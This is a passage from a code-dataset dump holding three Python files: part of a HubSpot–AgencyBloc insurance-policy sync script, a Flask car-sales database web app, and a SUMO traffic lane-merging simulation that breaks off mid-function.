if not status:\n status = x['properties'].get('plan__status')\n contact_id = x['properties']['originally_associated_contact_id']\n if status == '200' or not hb_show_active_only:\n arr.append((pid, status, contact_id))\n hid[k] = arr\n return hdic, hid\n\ndef policy_groups(olabel, ab_show_active_only = True, hb_show_active_only = True):\n object_id = oid_dic[olabel.upper()]\n ab_check = load_agency_bloc(olabel)\n abd = {}\n adic = {}\n for x in ab_check:\n carrier, pnumber = (x['carrier'],x['policyNumber'])\n k = (safe_up(carrier), pnumber.strip())\n arr = abd.get(k, [])\n adic[k] = adic.get(k, []) + [x]\n pid, status, contact_id = (x['policyID'], x['policyStatus'], x['entityID'])\n if status.lower() == 'active' or status == '200' or not ab_show_active_only:\n arr.append((pid, status, contact_id))\n abd[k] = arr\n\n hdic, hid = hs_load_policies(olabel, hb_show_active_only)\n\n out = []\n for k in set(abd).union(set(hid)):\n car, pnumber = k\n ab_arr = abd.get(k, [])\n hb_arr = hid.get(k, [])\n group = []\n for rid, status, contact_id in ab_arr:\n d = {\n 'carrier': car,\n 'policy_number': pnumber,\n 'type': 'agency_bloc',\n 'status': status,\n 'id': rid,\n 'link':'https://app.agencybloc.com/policies/'+str(rid)+'/detail',\n 'contact_id': contact_id,\n 'contact_link': 'https://app.agencybloc.com/individuals/'+str(contact_id)+'/detail'\n }\n group.append(d)\n for rid, status, contact_id in hb_arr:\n if contact_id:\n contact_link = 'https://app.hubspot.com/contacts/7879306/contact/'+contact_id\n else:\n contact_link = None\n d = {\n 'carrier': car,\n 'policy_number': pnumber,\n 'type': 'hubspot',\n 'status': status,\n 'id': rid,\n 'link':'https://app.hubspot.com/contacts/7879306/record/'+object_id+'/'+str(rid),\n 'contact_id': contact_id,\n 'contact_link': contact_link\n }\n group.append(d)\n\n out.append(group)\n return out, adic, hdic\n\ndef split_error_groups(arr):\n ok, err = [],[]\n for group in arr:\n types = set([x['type'] for x in group])\n if len(types) == 2 and len(group) == 2:\n ok.append(group)\n else:\n err.append(group)\n single_h = []\n single_a = []\n other = []\n for group in err:\n if len(group) == 1:\n if group[0]['type'] == 'agency_bloc':\n single_a = single_a + group\n else:\n assert group[0]['type'] == 'hubspot'\n single_h = single_h + group\n else:\n other.append(group)\n\n no_action, update = [],[]\n for group in ok:\n x,y = group\n if x['status'] == y['status']:\n no_action.append(group)\n else:\n update.append(group)\n\n return no_action, update, single_h, single_a, other\n\ndef agent_routine(arr):\n default_agent_id = '168441184' # house account for deactivated agents\n\n print(\"checking that egents exist\")\n ab_agents = ab.get_agents()\n ab_agents_by_email = {x['email']: x for x in ab_agents}\n default_agent = ab_agents_by_email['house.enlightnu.noemail@medicareschool.com']\n\n hb_agents = hs.get_agents()\n\n agents_to_add = []\n for x in arr:\n hb_agent_id, has_agent = agent_checker(x, hb_agents, ab_agents_by_email)\n if not has_agent:\n agents_to_add.append(hb_agent_id)\n agents_to_add = list(set(agents_to_add))\n agents_use_house = []\n agent_args = []\n print(\"Trying to create missing agents\")\n for i in agents_to_add:\n d = hb_agents.get(i, {})\n firstname = d.get('firstName')\n lastname = d.get('lastName')\n email = d.get('email')\n if firstname and lastname and email:\n agent_args.append((firstname, lastname, email))\n print('created agent', firstname, lastname)\n else:\n # using house account:\n print(\"Using house account for agent id\", i)\n agents_use_house.append(i)\n\n if agent_args:\n ab.create_agents(agent_args)\n\n for x in arr:\n _, has_agent = agent_checker(x, hb_agents, ab_agents_by_email)\n if has_agent:\n x['agent'] = has_agent\n else:\n x['agent'] = default_agent\n\nreport_columns = [\n 'policy_number',\n 'carrier',\n 'hubspot_status',\n 'agencybloc_status_old',\n 'agencybloc_status_new',\n 'action',\n 'hubspot_id',\n 'agencybloc_id',\n 'hubspot_link',\n 'agencybloc_link',\n]\n\ndef format_for_review(create, update, archive, hdic, adic, out1, object_id):\n fcreate = format_response_create(create, out1.get('create_response',({}, None)), object_id)\n fupdate = format_response_update(update, out1.get('update_response',({}, None)), object_id)\n farchive = format_response_archive(archive, out1.get('archive_response',({},None)), hdic, adic, object_id)\n return foldl(lambda a,b: a + list(b.values()), [], [fcreate, fupdate, farchive])\n\ndef format_response_create(arr, resp, object_id):\n dd = {}\n for d1,d2 in resp[0]:\n pid = d1.get('Agencybloc Response', {}).get('policyID')\n d = {\n 'agencybloc_id': pid,\n 'agencybloc_status_new': d1.get('Agencybloc Response', {}).get('Status'),\n 'action': d1.get('Agencybloc Response', {}).get('Action'),\n 'agencybloc_link': 'https://app.agencybloc.com/policies/'+pid+'/detail',\n }\n hubspot_id = d2.get('id')\n dd[hubspot_id] = d\n for dic in arr:\n d = {\n 'policy_number': dic['policy_number'],\n 'carrier': dic['carrier'],\n 'hubspot_status': dic['status'],\n 'agencybloc_status_old': None,\n 'hubspot_id': dic['id'],\n 'hubspot_link': 'https://app.hubspot.com/contacts/7879306/record/'+object_id+'/'+dic['id']\n }\n hid = dic['id']\n d2 = dd.get(hid, {})\n dnew = d | d2\n dd[hid] = dnew\n return dd\n\n\ndef format_response_update(arr, resp, object_id):\n dd = {}\n for d1,d2 in resp[0]:\n pid = d1.get('Agencybloc Response', {}).get('policyID')\n d = {\n 'agencybloc_id': pid,\n 'agencybloc_status_new': d1.get('Agencybloc Response', {}).get('Status'),\n 'action': d1.get('Agencybloc Response', {}).get('Action', 'default_update?'),\n 'agencybloc_link': 'https://app.agencybloc.com/policies/'+pid+'/detail',\n }\n hubspot_id = d2.get('id')\n dd[hubspot_id] = d\n for group in arr:\n x,y = group\n if x['type'] == 'hubspot':\n h,a = x,y\n else:\n a,h = x,y\n d = {\n 'policy_number': h['policy_number'],\n 'carrier': h['policy_number'],\n 'hubspot_status': h['status'],\n 'agencybloc_status_old': a['status'],\n 'hubspot_id': h['id'],\n 'hubspot_link': 'https://app.hubspot.com/contacts/7879306/record/'+object_id+'/'+h['id']\n }\n hubspot_id = h['id']\n d2 = dd.get(hubspot_id, {})\n dnew = d | d2\n dd[hubspot_id] = dnew\n return dd\n\ndef format_response_archive(arr, resp, hdic, adic, object_id):\n dd = {}\n adic_new = {x[0]['policyID']: x[0] for x in adic.values()}\n for d1,d2 in resp[0]:\n pid = d1.get('Agencybloc Response', {}).get('policyID')\n d = {\n 'agencybloc_id': pid,\n 'agencybloc_status_new': 'Archive',\n 'action': 'archive',\n 'agencybloc_link': 'https://app.agencybloc.com/policies/'+pid+'/detail',\n }\n dd[pid] = d\n for aid in [x['id'] for x in arr]:\n print(aid)\n dic = adic_new.get(aid, {})\n hubspot_status = None\n hubspot_link = None\n d = {\n 'policy_number': dic.get('policyNumber'),\n 'carrier': dic.get('carrier'),\n 'hubspot_status': None,\n 'agencybloc_status_old': dic.get('status'),\n 'hubspot_id': None,\n 'hubspot_link': None,\n }\n d2 = dd.get(aid, {})\n dnew = d | d2\n dd[aid] = dnew\n return dd\n\ndef flatten_records(arr, out_arr):\n for x in arr:\n if type(x) == dict:\n out_arr.append(x)\n else:\n out_arr = flatten_records(x, out_arr)\n return out_arr\n", "repo_name": "pyrex41/payroll-api", "sub_path": "production_funcs.py", "file_name": "production_funcs.py", "file_ext": "py", "file_size_in_byte": 18881, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "helpers.hs_get", "line_number": 52, "usage_type": "call"}, {"api_name": "helpers.hs_path", "line_number": 54, "usage_type": "call"}, {"api_name": "hubspot_migrate.batch_search", "line_number": 60, "usage_type": "call"}, {"api_name": "helpers.ab_post", "line_number": 69, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 70, "usage_type": "call"}, {"api_name": "helpers.foldl", "line_number": 123, "usage_type": "call"}, {"api_name": "hubspot.batch_contacts", "line_number": 177, "usage_type": "call"}, {"api_name": "agency_bloc.create_policies", "line_number": 198, "usage_type": "call"}, {"api_name": "agency_bloc.update_policies", "line_number": 216, "usage_type": "call"}, {"api_name": "agency_bloc.get_commission_field", "line_number": 362, "usage_type": "call"}, {"api_name": "agency_bloc.get_agents", "line_number": 466, "usage_type": "call"}, {"api_name": "hubspot.get_agents", "line_number": 470, "usage_type": "call"}, {"api_name": "agency_bloc.create_agents", "line_number": 495, "usage_type": "call"}, {"api_name": "helpers.foldl", "line_number": 521, "usage_type": "call"}]}
+{"seq_id": "31383232767", "text": "from flask import Flask, render_template, request, session, url_for, redirect\nimport sqlReader as sq\napp = Flask(__name__, template_folder=\"/Users/ahmedmoamen/Desktop/ahmed/school/2023 spring/Databases/Car Sale Database/project_milestone3/templates\")\napp.secret_key = 'project2'\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/register')\ndef register():\n return render_template('register.html')\n\n@app.route('/signup', methods=['GET', 'POST'])\ndef signup():\n if request.method == 'POST':\n username = request.form['username']\n password = request.form['password']\n email = request.form['email']\n dob = request.form['dob']\n gender = request.form['gender']\n make = request.form.getlist('make[]')\n model = request.form.getlist('model[]')\n year = request.form.getlist('year[]')\n\n cars = []\n for i in range(len(make)):\n car = [make[i], model[i], year[i]]\n cars.append(car)\n print(username, password, email, dob, gender, cars)\n if sq.regesiterUser(dob, email, gender, password, username, cars):\n return render_template('index.html')\n else:\n return render_template('register.html')\n\n@app.route('/Sale_page')\ndef Sale_page():\n return render_template('login.html')\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n email = request.form['email']\n password = request.form['password']\n if sq.checkUser(email, password):\n session['email'] = email\n return render_template('sale.html')\n else:\n return render_template('login.html')\n\n\n@app.route('/add_sale', methods=['GET', 'POST'])\ndef add_sale():\n AdId = request.form['ad_id']\n PriceBought = request.form['price_bought']\n rating = request.form['rating']\n review = request.form['review']\n email = session.get('email')\n\n if sq.UserPurchase(AdId, email, PriceBought, rating, review):\n return render_template('index.html')\n else:\n return render_template('sale.html')\n\n@app.route('/view_reviews')\ndef view_reviews():\n return render_template('viewReview.html')\n\n@app.route('/Search01', methods=['GET', 'POST'])\ndef Search01():\n AdId = request.form.get(\"ad_id\")\n result = sq.viewReview(AdId)\n if result:\n review = result[0]\n return render_template('viewReview.html', review= review, ADID= AdId)\n else:\n return render_template('viewReview.html')\n\n@app.route('/view_rating')\ndef view_rating():\n return render_template('view _aggregated_rating.html')\n\n@app.route('/Search00', methods=['GET', 'POST'])\ndef Search00():\n phone = request.form.get(\"phone_number\")\n print(phone)\n result = sq.viewRating(phone)\n rating = result[0]\n return render_template('view _aggregated_rating.html', rating= str(rating)+\"/5\")\n\n\n@app.route('/show_ads')\ndef show_ads():\n return render_template('show_all_ads.html')\n\n@app.route('/Search0', methods=['GET', 'POST'])\ndef Search0():\n Make = request.form.get('Make')\n Year = request.form.get('Year')\n Location = request.form.get('Location')\n BodyType = request.form.get('BodyType')\n table1 = sq.showAllads(BodyType,Make,Year,Location)\n table2 = sq.showAdsAvgPrice(BodyType,Make,Year,Location)\n return render_template('show_all_ads.html', table1= table1, table2= table2)\n\n@app.route('/show_used_cars')\ndef show_used_cars():\n return render_template('filterFeatures.html')\n@app.route('/Search1', methods=['GET', 'POST'])\ndef Search1():\n features = request.form.getlist('Features[]')\n min_price = request.form.get('min-price')\n max_price = request.form.get('max-price')\n location = request.form.get('location')\n results = sq.filterFeatures(features,min_price,max_price, location)\n return render_template('filterFeatures.html', results= results)\n\n@app.route('/top_areas')\ndef top_areas():\n return render_template('top5location.html')\n@app.route('/Search2', methods=['GET', 'POST'])\ndef Search2():\n make = request.form.get('make')\n model = request.form.get('model')\n results = sq.Top5Location(make, model)\n print(results)\n return render_template('top5location.html', results= results)\n\n@app.route('/top_sellers')\ndef top_sellers():\n results = sq.top5sellers()\n return render_template('top5Sellers.html', results= results)\n\n@app.route('/show_properties')\ndef show_properties():\n return render_template(\"sellerInventory.html\")\n\n@app.route('/Search3', methods=['GET', 'POST'])\ndef Search3():\n phone = request.form.get('Phone')\n results = sq.SellerInventory(phone)\n return render_template('sellerInventory.html', results= results)\n\n@app.route('/top_cars')\ndef top_cars():\n return render_template('top5amount.html')\n\n@app.route('/Search4', methods=['GET', 'POST'])\ndef Search4():\n min = request.form.get('LowYear')\n max = request.form.get('HighYear')\n results = sq.top5amount(min, max)\n return render_template('top5amount.html', results= results)\n\n\n", "repo_name": "ahmedmoamen1/Car-Sales-database", "sub_path": "WebApp/webPage.py", "file_name": "webPage.py", "file_ext": "py", "file_size_in_byte": 4995, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Flask", "line_number": 3, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 17, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.request.form.getlist", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 22, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.request.form.getlist", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 23, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.request.form.getlist", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "sqlReader.regesiterUser", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 42, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 42, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 43, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 43, "usage_type": "name"}, {"api_name": "sqlReader.checkUser", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 45, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 53, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 53, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 54, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 57, "usage_type": "name"}, {"api_name": "sqlReader.UserPurchase", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 70, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 70, "usage_type": "name"}, {"api_name": "sqlReader.viewReview", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 84, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 84, "usage_type": "name"}, {"api_name": "sqlReader.viewRating", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 93, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 97, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 97, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 97, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 98, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 98, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 98, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 99, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 99, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 99, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 100, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 100, "usage_type": "name"}, {"api_name": "sqlReader.showAllads", "line_number": 101, "usage_type": "call"}, {"api_name": "sqlReader.showAdsAvgPrice", "line_number": 102, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 107, "usage_type": "call"}, {"api_name": "flask.request.form.getlist", "line_number": 110, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 110, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 110, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 111, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 111, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 111, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 112, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 112, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 112, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 113, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 113, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 113, "usage_type": "name"}, {"api_name": "sqlReader.filterFeatures", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 115, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 122, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 122, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 122, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 123, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 123, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 123, "usage_type": "name"}, {"api_name": "sqlReader.Top5Location", "line_number": 124, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 126, "usage_type": "call"}, {"api_name": "sqlReader.top5sellers", "line_number": 130, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 131, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 135, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 139, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 139, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 139, "usage_type": "name"}, {"api_name": "sqlReader.SellerInventory", "line_number": 140, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 141, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 145, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 149, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 149, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 149, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 150, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 150, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 150, "usage_type": "name"}, {"api_name": "sqlReader.top5amount", "line_number": 151, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 152, "usage_type": "call"}]}
+{"seq_id": "30712311795", "text": "#!/usr/bin/env python\n# old version of dp\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom http.client import NotConnected\n\nimport os\nimport sys\nimport optparse\nimport random\nfrom tkinter.messagebox import NO\nimport numpy as np\nfrom collections import namedtuple\n\nVehicle = namedtuple(\"Vehicle\", \"id time\")\n\n# we need to import python modules from the $SUMO_HOME/tools directory\nif 'SUMO_HOME' in os.environ:\n tools = os.path.join(os.environ['SUMO_HOME'], 'tools')\n sys.path.append(tools)\nelse:\n sys.exit(\"please declare environment variable 'SUMO_HOME'\")\n\nfrom sumolib import checkBinary\nimport traci\n\n\ndef generate_routefile(timeStep, N, pA, pB, pC):\n # random.seed(42) # make tests reproducible\n with open(\"./sumo_data/laneMerging.rou.xml\", \"w\") as routes:\n print(\"\"\"\n \n \n \n\n \n \n \n \"\"\", file=routes)\n num_A = 1\n num_B = 1\n num_C = 1\n t = 1.0\n while num_A <= N or num_B <= N or num_C <= N:\n if num_A <= N and random.uniform(0, 1) < pA:\n print(' ' % (\n num_A, t), file=routes)\n num_A += 1\n if num_B <= N and random.uniform(0, 1) < pB:\n print(' ' % (\n num_B, t), file=routes)\n num_B += 1\n if num_C <= N and random.uniform(0, 1) < pC:\n print(' ' % (\n num_C, t), file=routes)\n num_C += 1\n t += timeStep\n print(\" \", file=routes)\n\ndef compute_earliest_arrival(laneLength, schedule_A, schedule_BX, schedule_BY, schedule_C):\n a = [Vehicle('', 0)]\n b = [Vehicle('', 0)]\n c = [Vehicle('', 0)]\n currentTime = traci.simulation.getTime()\n\n # Vehicles in communication range on lane A\n for vehID in traci.lanearea.getLastStepVehicleIDs(\"dA\"):\n dist = laneLength - traci.vehicle.getDistance(vehID)\n speed = traci.vehicle.getSpeed(vehID)\n accel = traci.vehicle.getAcceleration(vehID)\n arrivalTime = 0\n if speed == 0:\n for i in schedule_A:\n if i.id == vehID:\n arrivalTime = i.time\n break\n else:\n if accel != 0:\n arrivalTime = currentTime + \\\n (((max(0, speed ** 2 + 2 * accel * dist)) ** 0.5 - speed) / accel)\n else:\n arrivalTime = currentTime + dist / speed\n for i in schedule_A:\n if i.id == vehID:\n if i.time < arrivalTime:\n arrivalTime = i.time\n break\n a.append(Vehicle(vehID, arrivalTime))\n\n # Vehicles in communication range on lane B\n for vehID in traci.lanearea.getLastStepVehicleIDs(\"dB\"):\n dist = laneLength - traci.vehicle.getDistance(vehID)\n speed = traci.vehicle.getSpeed(vehID)\n accel = traci.vehicle.getAcceleration(vehID)\n arrivalTime = 0\n if speed == 0:\n isFound = False\n for i in schedule_BX:\n if i.id == vehID:\n arrivalTime = i.time\n isFound = True\n break\n if not isFound:\n for i in schedule_BY:\n if i.id == vehID:\n arrivalTime = i.time\n break\n else:\n if accel != 0:\n arrivalTime = currentTime + \\\n (((max(0, speed ** 2 + 2 * accel * dist)) ** 0.5 - speed) / accel)\n else:\n arrivalTime = currentTime + dist / speed\n isFound = False\n for i in schedule_BX:\n if i.id == vehID:\n if i.time < arrivalTime:\n arrivalTime = i.time\n isFound = True\n break\n if not isFound:\n for i in schedule_BY:\n if i.id == vehID:\n if i.time < arrivalTime:\n arrivalTime = i.time\n break\n b.append(Vehicle(vehID, arrivalTime))\n\n # Vehicles in communication range on lane C\n for vehID in traci.lanearea.getLastStepVehicleIDs(\"dC\"):\n dist = laneLength - traci.vehicle.getDistance(vehID)\n speed = traci.vehicle.getSpeed(vehID)\n accel = traci.vehicle.getAcceleration(vehID)\n arrivalTime = 0\n if speed == 0:\n for i in schedule_C:\n if i.id == vehID:\n arrivalTime = i.time\n else:\n if accel != 0:\n arrivalTime = currentTime + \\\n (((max(0, speed ** 2 + 2 * accel * dist)) ** 0.5 - speed) / accel)\n else:\n arrivalTime = currentTime + dist / speed\n for i in schedule_C:\n if i.id == vehID:\n if i.time < arrivalTime:\n arrivalTime = i.time\n break\n c.append(Vehicle(vehID, arrivalTime))\n a[1:] = sorted(a[1:], key=lambda x: int(x.id.split('_')[1]))\n b[1:] = sorted(b[1:], key=lambda x: int(x.id.split('_')[1]))\n c[1:] = sorted(c[1:], key=lambda x: int(x.id.split('_')[1]))\n\n return a, b, c\n\n\ndef run(alpha, beta, gamma, W_same, W_diff):\n period = 20\n schedule_A = []\n schedule_BX = []\n schedule_BY = []\n schedule_C = []\n leaveA = False\n leaveBX = False\n leaveBY = False\n leaveC = False\n countdownX = 0\n countdownY = 0\n gA = False\n gBX = False\n gBY = False\n gC = False\n timeStep_cnt = 0\n passTime_dX = 0\n passTime_dY = 0\n A_IDs = []\n B_IDs = []\n C_IDs = []\n A_head = \"A_1\"\n B_head = \"B_1\"\n C_head = \"C_1\"\n\n \"\"\"execute the TraCI control loop\"\"\"\n while traci.simulation.getMinExpectedNumber() > 0: # The number of vehicles which are in the net plus the ones still waiting to start.\n # Disable lane changing\n for vehID in traci.simulation.getLoadedIDList():\n traci.vehicle.setLaneChangeMode(vehID, 0b000000000000)\n # Forward\n traci.simulationStep()\n timeStep_cnt += 1\n # Initially set all traffic lights to green\n traci.trafficlight.setPhase(\"TL1\", 1)\n\n leaveA = False # Whether a vehicle left from lane A at the last step\n leaveBX = False # Whether a vehicle left from lane B and go to lane X at the last step\n leaveBY = False # Whether a vehicle left from lane B and go to lane Y at the last step\n leaveC = False # Whether a vehicle left from lane C at the last step\n\n ''' Schedule '''\n if timeStep_cnt % period == 0: # Every period\n # If all the three lanes are not empty\n if traci.lanearea.getLastStepVehicleNumber(\"dA\") > 0 and traci.lanearea.getLastStepVehicleNumber(\"dB\") > 0 and traci.lanearea.getLastStepVehicleNumber(\"dC\") > 0:\n a, b, c = compute_earliest_arrival()\n schedule_A, schedule_BX, schedule_BY, schedule_C = schedule(\n a, b, c)\n # Sort the schedule by the entering time\n schedule_A.sort(key=lambda x: x[1])\n schedule_BX.sort(key=lambda x: x[1])\n schedule_BY.sort(key=lambda x: x[1])\n schedule_C.sort(key=lambda x: x[1])\n # Set the route for vehicles on lane B\n for veh in schedule_BX:\n try:\n traci.vehicle.setRouteID(veh.id, \"route_1\")\n except: # Too late to set the route\n # print('leaveBY', veh)\n # print(f'Remove {veh.id} from schedule_BX')\n schedule_BX.remove(veh)\n leaveBY = True\n for veh in schedule_BY:\n try:\n traci.vehicle.setRouteID(veh.id, \"route_2\")\n except:\n # print('leaveBX', veh)\n # print(f'Remove {veh.id} from schedule_BY')\n schedule_BY.remove(veh)\n leaveBX = True\n\n ''' Detect the passing vehicles '''\n # Get the ID list of the vehicles on each lane\n A_IDs = traci.edge.getLastStepVehicleIDs(\"A\")\n B_IDs = traci.edge.getLastStepVehicleIDs(\"B\")\n C_IDs = traci.edge.getLastStepVehicleIDs(\"C\")\n # Sort the list by the ID number\n A_IDs = sorted(A_IDs, key=lambda x: int(x.split('_')[1]))\n B_IDs = sorted(B_IDs, key=lambda x: int(x.split('_')[1]))\n C_IDs = sorted(C_IDs, key=lambda x: int(x.split('_')[1]))\n # A vehicle left from lane A at the last step\n if len(A_IDs) > 0 and A_IDs[0] != A_head:\n # print(A_head, \"leaves\")\n passTime_dX = traci.simulation.getTime() - 1 # Update the last passing time\n leaveA = True\n for s in schedule_A: # Remove it from the schedule\n if s.id == A_head:\n schedule_A.remove(s)\n break\n A_head = A_IDs[0] # Update the first vehicle on the lane\n elif len(A_IDs) == 0 and len(A_head) > 0:\n # The last vehicle left from lane A at the last step\n if int(A_head.split('_')[1]) == alpha:\n # print(A_head, \"leaves\")\n passTime_dX = traci.simulation.getTime() - 1\n leaveA = True\n for s in schedule_A:\n if s.id == A_head:\n schedule_A.remove(s)\n break\n A_head = \"\"\n if len(B_IDs) > 0 and B_IDs[0] != B_head:\n # print(B_head, \"leaves\")\n isFound = False # Find the vehicle is scheduled to lane X or lane Y\n for s in schedule_BX:\n if s.id == B_head:\n passTime_dX = traci.simulation.getTime()\n leaveBX = True\n schedule_BX.remove(s)\n isFound = True\n break\n if not isFound:\n for s in schedule_BY:\n if s.id == B_head:\n passTime_dY = traci.simulation.getTime()\n leaveBY = True\n schedule_BY.remove(s)\n break\n B_head = B_IDs[0]\n elif len(B_IDs) == 0 and len(B_head) > 0:\n if int(B_head.split('_')[1]) == beta:\n # print(B_head, \"leaves\")\n isFound = False\n for s in schedule_BX:\n if s.id == B_head:\n passTime_dX = traci.simulation.getTime()\n leaveBX = True\n schedule_BX.remove(s)\n isFound = True\n break\n if not isFound:\n for s in schedule_BY:\n if s.id == B_head:\n passTime_dY = traci.simulation.getTime()\n leaveBY = True\n schedule_BY.remove(s)\n break\n B_head = \"\"\n if len(C_IDs) > 0 and C_IDs[0] != C_head:\n # print(C_head, \"leaves\")\n passTime_dY = traci.simulation.getTime()\n leaveC = True\n for s in schedule_C:\n if s.id == C_head:\n schedule_C.remove(s)\n break\n C_head = C_IDs[0]\n elif len(C_IDs) == 0 and len(C_head) > 0:\n if int(C_head.split('_')[1]) == gamma:\n # print(C_head, \"leaves\")\n passTime_dY = traci.simulation.getTime()\n leaveC = True\n for s in schedule_C:\n if s.id == C_head:\n schedule_C.remove(s)\n break\n C_head = \"\"\n\n ''' Decide the phase of traffic lights '''\n # If there is at least one vehicle on an incoming lane\n if traci.lanearea.getLastStepVehicleNumber(\"dA\") > 0 or traci.lanearea.getLastStepVehicleNumber(\"dB\") > 0 or 